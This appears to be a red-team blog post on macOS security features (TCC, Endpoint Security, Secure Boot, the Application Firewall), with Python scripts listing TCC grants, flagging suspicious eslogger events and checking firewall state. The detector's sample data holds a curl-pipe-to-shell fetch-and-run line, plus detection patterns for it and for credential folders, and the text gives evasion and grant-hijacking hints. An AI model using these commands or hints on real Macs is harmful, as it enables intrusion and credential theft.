macOS security fundamentals for red team professionals - Part 4
Learn about Transparency Consent and Control (TCC), Endpoint Security, Secure Boot, Application Firewall and how they work.
I recently ventured into macOS security and how to get past it for red team tradecraft. This series of posts contains an overview of components that make up macOS security architecture:
macOS security fundamentals for red team professionals - Part 1
macOS security fundamentals for red team professionals - Part 2
macOS security fundamentals for red team professionals - Part 3
Transparency Consent and Control (TCC) - It is a framework, provided by Apple, that enables users to control the permissions granted to applications. It ensures that an application obtains explicit permission from the user before accessing sensitive data or services such as location, camera, photos, microphone, contacts, calendar and the protected user folders (Desktop, Documents, Downloads). Decisions are recorded in an SQLite database, TCC.db (it is not encrypted; it is protected by access controls instead), which stores the requesting client (a bundle identifier or an absolute path), the service it requested, the user's decision (allow or deny) and the code-signing requirement the grant is bound to. Many of these permissions can be managed from the Privacy & Security pane in System Settings. The database is maintained at two places,
~/Library/Application Support/com.apple.TCC/TCC.db (user-specific)
and /Library/Application Support/com.apple.TCC/TCC.db (system-level)
. The system database is protected by SIP and the user database by TCC itself, so neither can be read by an ordinary process; a process that has been granted Full Disk Access can read both. It is important to note that TCC does not protect the whole home directory: hidden directories such as ~/.ssh and ~/.aws can be read by any process running as the user, and /tmp is not protected by TCC either.
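The following script, added here as an example (it is not code from the original post), reads a TCC.db with Python's standard sqlite3 module and lists which clients hold the grants a red teamer cares about most, such as Full Disk Access or Screen Recording. It assumes the access table layout of macOS 11 and later (service, client, client_type, auth_value, ...) and the documented auth_value codes; the sample_db() rows are constructed test data. On a real Mac the process running it (for example the terminal app) must itself hold Full Disk Access, otherwise the open fails:

```python
"""Summarise grants recorded in a TCC.db using only the standard library.

Added example, not code from the original post. It assumes the 'access'
table layout of macOS 11 and later (service, client, client_type,
auth_value, ...) and the documented meaning of auth_value: 0 denied,
1 unknown, 2 allowed, 3 limited. Reading a real TCC.db needs Full Disk
Access for the process doing the reading (for example, the terminal app).

Usage: python3 tcc_grants.py [path-to-TCC.db]   (defaults to the user DB)
"""
import sqlite3
import sys
from pathlib import Path

USER_DB = Path.home() / "Library/Application Support/com.apple.TCC/TCC.db"
SYSTEM_DB = Path("/Library/Application Support/com.apple.TCC/TCC.db")

AUTH_VALUE = {0: "denied", 1: "unknown", 2: "allowed", 3: "limited"}
CLIENT_TYPE = {0: "bundle id", 1: "path"}

# Services whose holders are the most interesting for a red teamer: a
# process that can hijack one of these clients inherits the grant.
HIGH_VALUE = {
    "kTCCServiceSystemPolicyAllFiles": "Full Disk Access",
    "kTCCServiceAccessibility": "Accessibility",
    "kTCCServiceScreenCapture": "Screen Recording",
    "kTCCServiceCamera": "Camera",
    "kTCCServiceMicrophone": "Microphone",
    "kTCCServiceAppleEvents": "Automation",
}


def open_db(path):
    """Open a TCC.db read-only so a live database is never modified."""
    uri = Path(path).resolve().as_uri() + "?mode=ro"
    return sqlite3.connect(uri, uri=True)


def grants(conn):
    """Every row of the access table, with the numeric columns decoded."""
    rows = conn.execute(
        "SELECT service, client, client_type, auth_value FROM access "
        "ORDER BY service, client"
    )
    return [
        {"service": service, "client": client,
         "client_type": CLIENT_TYPE.get(ctype, str(ctype)),
         "auth": AUTH_VALUE.get(auth, str(auth))}
        for service, client, ctype, auth in rows
    ]


def high_value_clients(conn):
    """{friendly service name: [clients]} for allowed high-value grants only."""
    out = {}
    for g in grants(conn):
        if g["service"] in HIGH_VALUE and g["auth"] == "allowed":
            out.setdefault(HIGH_VALUE[g["service"]], []).append(g["client"])
    return out


def sample_db():
    """Constructed in-memory stand-in for a TCC.db (test data, not real grants)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, auth_reason INTEGER, "
        "PRIMARY KEY (service, client, client_type))"
    )
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?)", [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2),
        ("kTCCServiceSystemPolicyAllFiles", "/usr/local/bin/backup-agent", 1, 2, 4),
        ("kTCCServiceScreenCapture", "us.zoom.xos", 0, 2, 2),
        ("kTCCServiceCamera", "us.zoom.xos", 0, 0, 2),
        ("kTCCServiceAddressBook", "com.example.notes", 0, 2, 2),
    ])
    return conn


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else USER_DB
    try:
        conn = open_db(path)
        summary = high_value_clients(conn)
    except sqlite3.OperationalError as err:
        sys.exit(f"cannot read {path}: {err} (does this process have Full Disk Access?)")
    for service, clients in summary.items():
        print(f"{service}: {', '.join(clients)}")
```

Point it at the system database to see grants that apply to every user; the client_type column tells you whether a grant is bound to a bundle identifier or to a bare path, and path-bound grants to writable locations are the ones worth a second look.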
Endpoint Security - Endpoint Security (ES) is a powerful functionality built into macOS. To keep it simple, you can think of ES as similar to Event Tracing for Windows, but with more features. Through ES, Apple offers a C API that delivers OS telemetry events (process execution, file opens, mounts, signals and so on) to a client running in user space rather than in the kernel. One benefit this has over Windows is that EDR/AV solutions on the Mac no longer need to run code in the kernel. At the crux of ES is the capability to produce events of two types, notify and auth. A notify event informs the ES client about an operation after it has happened, whereas an auth event is delivered before the operation completes and the client must explicitly allow or deny it (by calling es_respond_auth_result) before the event's deadline, otherwise the system terminates the client. Events from ES can be analyzed to detect malicious behavior. Because Apple has deprecated kernel extensions, ES clients are delivered as system extensions (an endpoint security extension) rather than as kernel code. This requires the application to hold the
com.apple.developer.endpoint-security.client
entitlement. To further strengthen security, this entitlement is restricted: Apple grants it on request only to developers enrolled in the Apple Developer Program who have a Developer ID, the extension must be signed with that Developer ID, and the user (or an MDM profile) must approve the extension and grant it Full Disk Access before it receives any events. From macOS 13 Apple also ships eslogger, a built-in ES client that prints events as JSON, which is a convenient way to see exactly what an EDR would see. If you want to learn more about Endpoint Security, watch this video from WWDC20. Refer to this article to learn more about ES architecture and how ES can be used for hunting malicious activity.
Secure Boot - This is a technology developed by Apple to verify the integrity of the operating system before it boots. If the verification fails, Secure Boot will not boot the operating system; instead it offers to reinstall macOS or boot from a different disk. On Intel Macs with the Apple T2 chip, Secure Boot offers three modes: Full Security, which only allows booting a signed macOS that Apple currently trusts; Medium Security, which allows any version of macOS ever signed by Apple, without checking whether Apple still trusts it; and No Security, which removes the boot-time checks and allows any operating system to boot. Apple silicon Macs use the names Full Security, Reduced Security and Permissive Security instead, and the policy is set per installed macOS volume rather than for the whole machine. These settings can be accessed and modified via the Startup Security Utility in recoveryOS. It is important to note that Secure Boot only functions during the boot process; it plays no role once the operating system has booted.
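To show what "analyzing ES events to detect malicious behavior" looks like in practice, here is an added example (not code from the original post, the referenced WWDC session or the linked article) that triages the line-delimited JSON eslogger prints for exec and open events. The key names it reads (event.exec.target.executable.path, event.exec.args, event.open.file.path, process.executable.path) follow eslogger's layout but are an assumption of this example and should be checked against your macOS version; the SAMPLE_EVENTS are constructed, not captured from a real machine. It also covers the TCC gap noted above: reads of ~/.ssh and ~/.aws are invisible to TCC, but an ES client sees the open event.

```python
"""Triage Endpoint Security events as printed by eslogger (macOS 13+).

Added example, not code from the original post. It assumes eslogger's
line-delimited JSON: each record has "event" -> {"exec": ...} or
{"open": ...} and "process" (the originating process). The key names used
below follow that layout but are an assumption; check them against the
output of your macOS version.

Usage on a Mac, as root from a terminal that holds Full Disk Access:
    sudo eslogger exec open | python3 es_triage.py
Without piped input the constructed SAMPLE_EVENTS below are scanned instead.
"""
import json
import re
import sys

# World-writable locations a dropper typically executes from.
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
# Credential stores that TCC leaves unprotected, so only ES sees reads of them.
SECRET_DIRS = ("/.ssh/", "/.aws/", "/.gnupg/", "/.config/gcloud/")
# "curl ... | sh", "wget ... | sudo bash", and similar one-liners.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b")


def triage(record):
    """Return a list of human-readable findings for one eslogger record."""
    findings = []
    event = record.get("event", {})
    parent = record.get("process", {}).get("executable", {}).get("path", "?")
    if "exec" in event:
        ex = event["exec"]
        target = ex["target"]
        path = target["executable"]["path"]
        if path.startswith(TEMP_DIRS):
            findings.append(f"exec from world-writable dir {path} (parent {parent})")
        # Platform and Developer ID binaries carry a signing_id; an empty one is unsigned.
        if not target.get("signing_id"):
            findings.append(f"unsigned binary executed: {path}")
        cmdline = " ".join(ex.get("args", []))
        if PIPE_TO_SHELL.search(cmdline):
            findings.append(f"download piped to shell by {parent}: {cmdline}")
    elif "open" in event:
        path = event["open"]["file"]["path"]
        if any(d in path for d in SECRET_DIRS):
            findings.append(f"credential file {path} opened by {parent}")
    return findings


def scan(lines):
    """Return [(seq_num, findings)] for every record that triggers a rule."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate non-JSON noise in the stream
        findings = triage(record)
        if findings:
            hits.append((record.get("seq_num"), findings))
    return hits


def _exec(seq, parent, path, signing_id, args):
    return json.dumps({"seq_num": seq, "process": {"executable": {"path": parent}},
                       "event": {"exec": {"target": {"executable": {"path": path},
                                                     "signing_id": signing_id},
                                          "args": args}}})


def _open(seq, parent, path):
    return json.dumps({"seq_num": seq, "process": {"executable": {"path": parent}},
                       "event": {"open": {"file": {"path": path}}}})


# Constructed sample stream (not captured from a real Mac).
SAMPLE_EVENTS = [
    _exec(1, "/bin/zsh", "/bin/ls", "com.apple.ls", ["ls", "-la"]),
    _exec(2, "/bin/zsh", "/private/tmp/.update", "", ["/private/tmp/.update"]),
    _exec(3, "/usr/bin/osascript", "/bin/bash", "com.apple.bash",
          ["bash", "-c", "curl -s http://203.0.113.7/a.sh | sh"]),
    _open(4, "/usr/bin/python3", "/Users/alice/.ssh/id_ed25519"),
    _open(5, "/Applications/TextEdit.app/Contents/MacOS/TextEdit",
          "/Users/alice/Documents/notes.txt"),
]

if __name__ == "__main__":
    source = SAMPLE_EVENTS if sys.stdin.isatty() else sys.stdin
    for seq, findings in scan(source):
        for finding in findings:
            print(f"[{seq}] {finding}")
```

Only notify events are handled here, since eslogger subscribes as a notify client; a real EDR would subscribe to the auth variants of the same events and answer each one from the corresponding rule before the deadline. The rules are deliberately simple, and the point for a red teamer is the inverse one: a payload that lands outside the temp directories, is signed, avoids pipe-to-shell staging and reads credentials through an already-trusted process trips none of them.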
Application Firewall - Application Firewall, or ALF, is a feature that blocks unauthorized incoming connections to a Mac. Unlike the Windows firewall, it is not a packet filter and it does not filter outbound traffic at all: it works per application and lets the user decide which applications and services may accept incoming connections. It can alert the user when an unknown application starts accepting connections and let them decide whether to allow or deny it, and its stealth mode makes the Mac ignore probes such as ICMP ping. It comes built in with macOS but is disabled by default; it is managed from the Network pane in System Settings or from the command line with /usr/libexec/ApplicationFirewall/socketfilterfw. For a red teamer this means an implant's outbound C2 traffic is never blocked by ALF; outbound filtering on macOS requires pf or a third-party product.
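The following script is an added example (not code from the original post) of checking ALF's posture from the command line. It wraps socketfilterfw, a real macOS binary, and parses the output of its --getglobalstate, --getstealthmode and --listapps options; the exact output wording the parsers expect is an assumption based on current macOS and may differ between versions, which is why parse_global_state prefers the numeric "State = N" when present. SAMPLE_LISTAPPS is constructed test input.

```python
"""Check the state of the macOS Application Firewall (ALF).

Added example, not code from the original post. It wraps socketfilterfw
(a real macOS binary) and parses its output; the output strings expected
below are an assumption based on current macOS and may differ by version.
"""
import re
import subprocess

SOCKETFILTERFW = "/usr/libexec/ApplicationFirewall/socketfilterfw"

# Meaning of the global state value (also stored as 'globalstate' in
# /Library/Preferences/com.apple.alf.plist).
GLOBAL_STATE = {0: "off", 1: "on (per-application rules)", 2: "on (block all incoming)"}


def parse_global_state(text):
    """'Firewall is enabled. (State = 1)' -> 1; falls back to the wording."""
    m = re.search(r"State = (\d)", text)
    if m:
        return int(m.group(1))
    return 0 if "disabled" in text.lower() else 1


def parse_stealth(text):
    """'Stealth mode enabled' / 'Stealth mode disabled' -> bool."""
    lowered = text.lower()
    return "enabled" in lowered and "disabled" not in lowered


def parse_app_list(text):
    """Parse --listapps output into {app path: True if allowed to accept incoming}."""
    apps = {}
    current = None
    for line in text.splitlines():
        m = re.match(r"\s*\d+\s*:\s*(.+?)\s*$", line)
        if m:
            current = m.group(1)
            continue
        m = re.search(r"\(\s*(Allow|Block) incoming connections\s*\)", line)
        if m and current:
            apps[current] = m.group(1) == "Allow"
            current = None
    return apps


def assess(global_state, stealth, apps):
    """Findings a defender (or a red teamer sizing up a host) would want to know."""
    findings = []
    if global_state == 0:
        findings.append("ALF is off: any process may accept inbound connections")
    if not stealth:
        findings.append("stealth mode off: host answers ICMP and port probes")
    for app, allowed in apps.items():
        if allowed and not app.startswith("/Applications/"):
            findings.append(f"inbound allowed for binary outside /Applications: {app}")
    return findings


# Constructed sample of --listapps output (not captured from a real Mac).
SAMPLE_LISTAPPS = """ALF: total number of apps = 3

1 :  /Applications/Zoom.us.app
 \t ( Allow incoming connections )
2 :  /usr/local/bin/ngrok
 \t ( Allow incoming connections )
3 :  /Applications/Spotify.app
 \t ( Block incoming connections )
"""


def run(*flags):
    """Run socketfilterfw with the given flags and return its stdout."""
    return subprocess.run([SOCKETFILTERFW, *flags], capture_output=True,
                          text=True, check=True).stdout


if __name__ == "__main__":
    state = parse_global_state(run("--getglobalstate"))
    stealth = parse_stealth(run("--getstealthmode"))
    apps = parse_app_list(run("--listapps"))
    print(f"global state: {GLOBAL_STATE.get(state, state)}")
    for finding in assess(state, stealth, apps):
        print(" -", finding)
```

Changing the state (for example socketfilterfw --setglobalstate on or --setstealthmode on) needs root. Note that none of this affects outbound connections: even with ALF on and block-all enabled, a reverse shell or C2 beacon leaves the host unhindered.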
Red Team Notes
- Transparency Consent and Control (TCC) - Allows users to manage app permissions and provide consent for access to sensitive data and services.
- Endpoint Security (ES) - A macOS C API enabling user-space telemetry event access for detecting malicious behavior.
- Secure Boot - Ensures macOS integrity at startup; Intel T2 Macs offer Full, Medium and No Security, Apple silicon offers Full, Reduced and Permissive Security, both configured via the Startup Security Utility.
- Application Firewall (ALF) - A built-in macOS feature (disabled by default) that controls which applications may accept incoming connections; it does not filter outbound traffic.
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.